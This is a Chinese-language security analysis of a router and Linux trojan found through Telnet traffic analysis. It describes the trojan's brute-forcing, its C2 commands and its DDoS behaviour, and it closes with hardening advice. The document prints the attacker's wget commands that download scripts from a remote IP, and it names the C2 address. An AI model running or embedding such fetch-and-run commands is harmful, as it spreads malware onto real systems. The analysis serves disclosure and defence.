Author：Mr.Right、Gongmo
申明：文中提到的攻擊方式僅為曝光、打擊惡意網路攻擊行為，切勿模仿，否則後果自負。

0x00 前言

---

路由器木馬，其主要目標是控制網路的核心路由裝置；一旦攻擊成功，其危害性遠大於一臺主機被控。

如果僅僅在路由器上面防範該類木馬，那也是不夠的，有很多Linux伺服器違規開放Telnet埠，且使用了弱口令，一樣可以中招。下面我們就一起來回顧一起真實案例。

0x01 發現異常

---

在對客戶某伺服器區域進行安全監測時發現某伺服器通訊流量存在大量Telnet協議。擷取一段資料，進行協議統計：

Telnet協議一般為路由器管理協議，伺服器中存在此協議可初步判斷為異常流量。繼續進行埠、IP走向統計：發現大量外部IP透過Tcp23埠（Telnet）連線該伺服器。

此統計可說明：

1. 該伺服器違規開放了TCP23埠；
2. 該伺服器遭到大量Telnet攻擊，有可能是暴力破解，也有可能是已經成功連線。

挑選通訊量較大的IP，篩選通訊雙向資料：

檢視Telnet資料，發現已經成功連線該伺服器。

資料中還存在大量Telnet掃描探測、暴力破解攻擊，在此不再詳述。

0x02 獲取樣本

---

為進一步檢視Telnet通訊內容，Follow TcpStream。

將內容複製貼上至文字編輯器：

發現一段自動下載命令：

#!bash
wget http://208.67.1.42/bin.sh;
wget1 http://208.67.1.42/bin2.sh。

連線http://208.67.1.42/bin.sh可發現該指令碼檔案內容為自動下載獲取木馬，且木馬可感染ARM、MIPS、X86、PowerPC等架構的裝置。

0x03 木馬分析

---

（注：本章節不屬於Wireshark分析範疇，本文僅以jackmyx86分析為例）

該木馬檔案是ELF格式的，影響的作業系統包括：

從上圖中判斷木馬下載的型別分別是：Mipsel,misp,x86(其實這個是x64),arm,x86(i586,i686)等。

從截獲的*.sh檔案看，*.sh指令碼想刪除這些目錄和內容，並且關閉一些程式。

首先得到了一個”Art of war”的字串（看來駭客是個文藝青年）。

接著嘗試開啟路由器配置檔案。

在配置檔案裡查詢字串00000000，如果找到就直接填充0；

在初始化函式中：嘗試建立socket連線，連線地址為：208.67.1.194:164。

嘗試連線伺服器，等待遠端伺服器應答。

伺服器傳送“ping”命令後，客戶端返回“pong”表示已經連線成功。當傳送“GETLOCALIP”後，返回控制端的本機IP。當伺服器傳送SCANNER後，根據ON或者OFF來控制是否要掃描指定IP，進行暴力破解。當傳送“UDP”命令時候，向指定的IP地址傳送大量UDP無效資料包。

下圖是木馬嘗試獲得路由器的使用者名稱和密碼匹配，企圖暴力破解賬戶和密碼。

在被控制之後，跟隨伺服器指定的IP，傳送大量隨機生成的長度為0x400的字串資料，進行DDOS攻擊。下圖是傳送垃圾資料,進行DDOS攻擊。

隨機資料生成的虛擬碼如下：

根據網址追溯到攻擊者的網頁和twitter賬號。

0x04 總結

---

1. 路由器的管理如非必須，儘量不開放網際網路管理通道
2. 路由器管理密碼必須強口令、最好超強
3. Linux伺服器一般不要開啟Telnet服務
4. 該木馬一般利用爆破和漏洞來攻擊路由器或開啟Telnet服務的Linux伺服器，中招後接受木馬作者的控制，最後進行大量DDOS攻擊